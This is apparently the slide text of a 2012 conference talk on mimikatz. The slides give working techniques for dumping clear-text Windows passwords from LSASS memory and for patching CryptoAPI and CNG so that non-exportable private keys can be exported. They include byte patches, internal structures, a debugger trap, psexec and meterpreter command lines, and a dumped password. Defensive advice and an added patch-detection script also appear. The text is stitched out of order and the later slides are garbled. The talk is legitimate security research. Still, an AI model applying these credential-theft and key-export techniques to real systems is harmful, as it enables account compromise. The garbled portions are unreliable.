	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp : n.t. (LUID KO)
mimikatz / sekurlsa / what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;)
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz / crypto / what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)
[Diagram: mod_mimikatz_crypto]
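The PVK format named above (the module's private-key export format, which OpenSSL also reads), as an added example that is not mimikatz code: it builds an unencrypted PVK around a constructed toy RSA key and parses it back. The layout used is the published one (a 24-byte header: magic 0xB0B5F11E, reserved, key type, encrypted flag, salt length, key length; then the salt and a CryptoAPI PRIVATEKEYBLOB holding n, p, q, dp, dq, iqmp and d in little-endian order). The two 32-bit primes and the 64-bit modulus are constructed for the demonstration only and are far too small for real use; build_pvk, parse_pvk and RsaPrivate are names chosen here. The point for a defender: an unencrypted PVK carries every RSA component in the clear, so an exported file must be handled with the same care as the key itself.

```python
import struct
from dataclasses import dataclass

PVK_MAGIC = 0xB0B5F11E        # PVK file header magic
RSA2_MAGIC = 0x32415352       # 'RSA2': RSAPUBKEY magic for a private key blob
CALG_RSA_KEYX = 0x0000A400    # aiKeyAlg for an AT_KEYEXCHANGE RSA key
PRIVATEKEYBLOB, CUR_BLOB_VERSION = 0x07, 0x02
AT_KEYEXCHANGE = 1


@dataclass
class RsaPrivate:
    n: int
    e: int
    d: int
    p: int
    q: int


def rsa_from_primes(p: int, q: int, e: int = 65537) -> RsaPrivate:
    """Derive a full RSA private key from two primes (toy sizes only)."""
    phi = (p - 1) * (q - 1)
    return RsaPrivate(p * q, e, pow(e, -1, phi), p, q)


def _le(x: int, size: int) -> bytes:
    return x.to_bytes(size, "little")


def build_pvk(key: RsaPrivate, bitlen: int) -> bytes:
    """Serialise the key as an unencrypted PVK: 24-byte header + PRIVATEKEYBLOB."""
    half, full = bitlen // 16, bitlen // 8
    dp, dq, iqmp = key.d % (key.p - 1), key.d % (key.q - 1), pow(key.q, -1, key.p)
    # BLOBHEADER {bType, bVersion, reserved, aiKeyAlg}, then RSAPUBKEY {magic, bitlen, pubexp}
    blob = struct.pack("<BBHI", PRIVATEKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    blob += struct.pack("<III", RSA2_MAGIC, bitlen, key.e)
    # CryptoAPI stores every component little-endian: n, p, q, dp, dq, iqmp, d
    blob += _le(key.n, full) + _le(key.p, half) + _le(key.q, half)
    blob += _le(dp, half) + _le(dq, half) + _le(iqmp, half) + _le(key.d, full)
    # PVK header: magic, reserved, keytype, encrypted, saltlen, keylen (no salt when unencrypted)
    header = struct.pack("<IIIIII", PVK_MAGIC, 0, AT_KEYEXCHANGE, 0, 0, len(blob))
    return header + blob


def parse_pvk(data: bytes) -> dict:
    """Parse a PVK file. Returns header fields and, for an unencrypted RSA blob, the key."""
    magic, _reserved, keytype, encrypted, saltlen, keylen = struct.unpack_from("<IIIIII", data, 0)
    if magic != PVK_MAGIC:
        raise ValueError("not a PVK file")
    blob = data[24 + saltlen:24 + saltlen + keylen]
    info = {"keytype": keytype, "encrypted": bool(encrypted), "saltlen": saltlen}
    if encrypted:
        return info  # blob is RC4-encrypted under a password-derived key; not handled here
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    rmagic, bitlen, e = struct.unpack_from("<III", blob, 8)
    if btype != PRIVATEKEYBLOB or rmagic != RSA2_MAGIC:
        raise ValueError("not an RSA PRIVATEKEYBLOB")
    half, full = bitlen // 16, bitlen // 8
    pos = 20

    def take(size: int) -> int:
        nonlocal pos
        value = int.from_bytes(blob[pos:pos + size], "little")
        pos += size
        return value

    n, p, q = take(full), take(half), take(half)
    for _ in range(3):
        take(half)          # dp, dq, iqmp: recomputable from p, q and d
    d = take(full)
    info.update(alg=alg, bitlen=bitlen, key=RsaPrivate(n, e, d, p, q))
    return info


# Constructed toy key: two 32-bit primes, giving a 64-bit modulus (demo size only).
TOY_KEY = rsa_from_primes(0xFFFFFFFB, 0xFFFFFFEF)
TOY_BITLEN = 64

if __name__ == "__main__":
    pvk = build_pvk(TOY_KEY, TOY_BITLEN)
    parsed = parse_pvk(pvk)
    print(f"{len(pvk)} bytes, encrypted={parsed['encrypted']}, bitlen={parsed['bitlen']}")
    print("private exponent readable in the clear:", hex(parsed["key"].d))
```

Running the block writes and re-reads an 80-byte file image; the parser stops at the header when the encrypted flag is set, which is the state an exported PVK should be in whenever a password can be applied.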
mimikatz / crypto / how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
Constraint for most users / Unavailable for computer keys
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz / crypto / capi / how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your-apps-here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz / crypto / capi / how it's exported ( level)
[Flowchart: the process asks CryptoAPI and the RSA CSP, inside its own address space, to export a key; the CSP loads the private key (DPAPI decode) and checks whether it is exportable: yes → exported key; no → NTE_BAD_KEY_STATE]
mimikatz / crypto / patchcapi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz / crypto / patchcapi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz / crypto / patchcapi / demo time
Import, export, import as not exportable… export!
mimikatz / crypto / patchcapi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz / crypto / cng / how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz / crypto / cng / how it's exported ( level)
[Flowchart: the process asks CNG to export a key; the request goes over RPC to the KeyIso service in the LSASS process (an NT6 "System" protected process, mandatory label ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP and SYSTEM_MANDATORY_LABEL_NO_READ_UP), which loads the private key (DPAPI decode) and checks whether it is exportable: yes → exported key returned to the process; no → NTE_NOT_SUPPORTED]
mimikatz / crypto / patchcng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz / crypto / patchcng / because sometimes I own LSASS
This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
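Both listings (the rsaenh one a few slides back and the ncrypt one just above) follow a single pattern: a conditional jump that guards the "not exportable" error path is turned into an unconditional one, and the jump displacement is left untouched so the target stays the same. Neither DLL is supposed to change once it is mapped, so a defender can catch this by diffing a module's code section in the running process against the file image and looking for exactly that rewrite. The following Python is an added example, not mimikatz code or any Microsoft API: find_patches, classify and report are names chosen here, the sample sections are constructed around the instruction bytes shown on the slides (padding is arbitrary), and reading the live section from a process or memory image and applying relocations before the comparison are left to the caller.

```python
from dataclasses import dataclass
from typing import List, Optional

# Condition codes shared by the short (7x rel8) and near (0F 8x rel32) Jcc encodings.
JCC = ["jo", "jno", "jb", "jae", "jz", "jnz", "jbe", "ja",
       "js", "jns", "jp", "jnp", "jl", "jge", "jle", "jg"]


@dataclass
class Patch:
    offset: int      # first differing byte, relative to the start of the code section
    original: bytes  # bytes in the on-disk image
    patched: bytes   # bytes read from the loaded module


def find_patches(disk: bytes, memory: bytes) -> List[Patch]:
    """Maximal runs of bytes where the mapped code section differs from the file image."""
    if len(disk) != len(memory):
        raise ValueError("compare sections of equal size, after applying relocations")
    patches, i = [], 0
    while i < len(disk):
        if disk[i] == memory[i]:
            i += 1
            continue
        start = i
        while i < len(disk) and disk[i] != memory[i]:
            i += 1
        patches.append(Patch(start, disk[start:i], memory[start:i]))
    return patches


def classify(disk: bytes, memory: bytes, offset: int) -> Optional[str]:
    """Recognise a conditional jump rewritten as an unconditional one, so that the branch
    it guarded (here: the 'not exportable' error path) can no longer be taken."""
    d, m = disk[offset:offset + 6], memory[offset:offset + 6]
    # near form: 0F 8x rel32 (6 bytes) becomes 90 E9 rel32; rel32 unchanged, same target
    if (len(d) == 6 and d[0] == 0x0F and 0x80 <= d[1] <= 0x8F
            and m[0] == 0x90 and m[1] == 0xE9 and d[2:] == m[2:]):
        return f"near {JCC[d[1] & 0xF]} -> nop + jmp rel32 (same target)"
    # short form: 7x rel8 (2 bytes) becomes EB rel8; rel8 unchanged, same target
    if len(d) >= 2 and 0x70 <= d[0] <= 0x7F and m[0] == 0xEB and d[1] == m[1]:
        return f"short {JCC[d[0] & 0xF]} -> jmp short (same target)"
    return None


def report(disk: bytes, memory: bytes) -> List[str]:
    """One line per differing run: offset, bytes before and after, and a verdict."""
    lines = []
    for p in find_patches(disk, memory):
        verdict = classify(disk, memory, p.offset) or "unrecognised modification"
        lines.append(f"+0x{p.offset:x}: {p.original.hex()} -> {p.patched.hex()} : {verdict}")
    return lines


# Constructed sample sections (not real module bytes): filler around the two
# instructions shown on the slides, rsaenh's jnz rel32 and ncrypt's jnz short.
CAPI_DISK = b"\x8b\xff\x55\x8b\xec" + bytes.fromhex("0f8533c7ffff") + b"\xcc" * 5
CAPI_MEM = b"\x8b\xff\x55\x8b\xec" + bytes.fromhex("90e933c7ffff") + b"\xcc" * 5
CNG_DISK = b"\x90" * 4 + bytes.fromhex("751c") + b"\xcc" * 4
CNG_MEM = b"\x90" * 4 + bytes.fromhex("eb1c") + b"\xcc" * 4

if __name__ == "__main__":
    for name, disk, mem in (("rsaenh", CAPI_DISK, CAPI_MEM), ("ncrypt", CNG_DISK, CNG_MEM)):
        for line in report(disk, mem):
            print(name, line)
```

The diff deliberately reports every differing run, not only the recognised Jcc rewrites: an unrecognised modification in a code section of a signed system DLL is worth an alert on its own, and the classifier only adds the "which check was disabled" detail for the pattern these slides use.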
mimikatz / crypto / patchcng / demo time
Import, export, import as not exportable… export again!
mimikatz / crypto / patchcng / limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz / crypto / patchcng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: La commande -exportPFX s'est terminée correctement.
mimikatz / crypto / memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz / crypto / what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts / computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz / what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz / that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft, to always consider it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz/
email: benjamin@gentilkiwi.com
mimikatz / sekurlsa / wdigest / theory
This time we know:
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so, it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList

.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz / sekurlsa / wdigest / workflow
[Workflow: LsaEnumerateLogonSessions → for each LUID, search the wdigest!l_LogSessList linked list for the matching KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory on its Password → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	/* […] */
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	/* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz / sekurlsa / wdigest / demo time
sekurlsa::wdigest

mimikatz / sekurlsa / livessp
because Microsoft was too good in closed networks
mimikatz / sekurlsa / livessp / how
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~ … be more brutal this time, make a WinDBG trap!

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz / sekurlsa / livessp / how
Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).

Stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  (our LiveSSP provider)

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah, Pass the Hash capability with Live accounts too…
Live users can log on through RDP via SSO
mimikatz / sekurlsa / livessp / workflow
[Workflow: LsaEnumerateLogonSessions → for each LUID, search the livessp!LiveGlobalLogonSessionList linked list for the matching KIWI_LIVESSP_LIST_ENTRY → its suppCreds KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory on its Password → password in clear]

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz / sekurlsa / kerberos
Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz / sekurlsa / kerberos (nt6) / workflow
[Workflow: LsaEnumerateLogonSessions → for each LUID, RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory on its Password → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa / kerberos (nt5) / workflow
[Workflow: LsaEnumerateLogonSessions → for each LUID, search the kerberos!KerbLogonSessionList linked list for the matching KIWI_KERBEROS_LOGON_SESSION (labelled KIWI_LIVESSP_PRIMARY_CREDENTIAL on the slide) → LsaUnprotectMemory on its Password → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	/* […] */
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz / sekurlsa / demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz / sekurlsa / kerberos / "hu?"
Ok, it works…
But why?
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash as shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
  – NTLM hash on the client…
  – the KDC sent it back as a gift
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
